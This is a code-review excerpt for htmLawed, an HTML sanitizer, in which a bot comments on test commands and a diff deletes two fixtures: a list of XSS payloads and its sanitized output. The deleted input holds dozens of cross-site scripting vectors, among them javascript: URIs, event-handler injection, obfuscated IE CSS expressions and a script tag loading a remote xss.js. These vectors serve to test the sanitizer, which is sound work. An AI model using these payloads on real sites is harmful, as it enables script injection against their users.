node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
nodejs htmLawed-test.js test_xss.txt
nodejs htmLawed-test.js
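Review bot: The commented PHP reference command that this hunk keeps as context still reads `test_xss.txt` and redirects into `test_php.htm`, but both files are removed by this same commit (their sections further down are pure deletions), so that comment now describes a run that can no longer be reproduced. Either drop it or point it at the fixture the node harness now consumes, e.g. `# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("<INPUT_FIXTURE>"), array("safe" => 1));' > <EXPECTED_OUTPUT>` with the placeholders filled in from htmLawed-test.js. The new `nodejs htmLawed-test.js` takes no path argument, so the harness presumably locates its fixtures itself; a one-line comment stating the directory it must be run from would save the next reader a failed run. The enclosing file continues outside this hunk on both sides.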
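--- a/test_php.htm
+++ b/test_php.htm
@@ -1,42 +0,0 @@
-<img alt="<img onmouseover=confirm(1)//" src="src" />
-'';!--"=&{()}<br />
-<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
-<img src="denied:javascript:alert('xss');" alt="image" /><br />
-<img src="denied:java script:alert('xss');" alt="image" /><br />
-<img src="denied:javascript:alert('XSS')" alt="image" /><br />
-<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
-<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
-<br />
-<br />
-<br />
-<!--[if gte IE 4]>alert('xss');<![endif]--><br />
-" src="http://ha.ckers.org/xss.js"><br />
-<strong>Bad in PHP version without safe:</strong> " ";alert(window.location.href);//><br />
-<br />
-<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
-<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
-<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
-<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss("*/ ");xss:ex XSS*/ /pression(alert("XSS"))">x</a><br />
-<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
-<strong>Bad IE7:</strong> <a style="xss:e #48;078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
-</span>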
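--- a/test_xss.txt
+++ b/test_xss.txt
@@ -1,44 +0,0 @@
-<img alt="<img onmouseover=confirm(1)//"<"">
-'';!--"<xss>=&{()}<br />
-<img src="javascript%3Aalert('xss');" /><br />
-<img src="javascript:alert('xss');" /><br />
-<img src="java script:alert('xss');" /><br />
-<img
-src=javascript:alert('XSS') /><br />
-<font color='#FF6699"onmouseover="alert(1)//'>test</font>
-<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'>
-<div style="javascript:alert('xss');"></div><br />
-<div style="background-image:url(javascript:alert('xss'));"></div><br />
-<div style="background-image:url("javascript:alert('xss')" );"></div><br />
-<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
-<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
-<strong>Bad in PHP version without safe:</strong> <script a=">" ";alert(window.location.href);//></script><br />
-<div style="background-image: url('js:xss')"></div><br />
-<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
-<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert
-%28%27xss%3f%29%29">x</a><br />
-<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a>
-<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>x</a><br />
-<strong>Bad IE7:</strong> <a style="background:Expre\ssion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:expre\ssion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br />
-<strong>Bad IE7:</strong> <a style="xss:e\0078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:url('java
-script:eval(document.all.mycode.expr)')">hi</a><br />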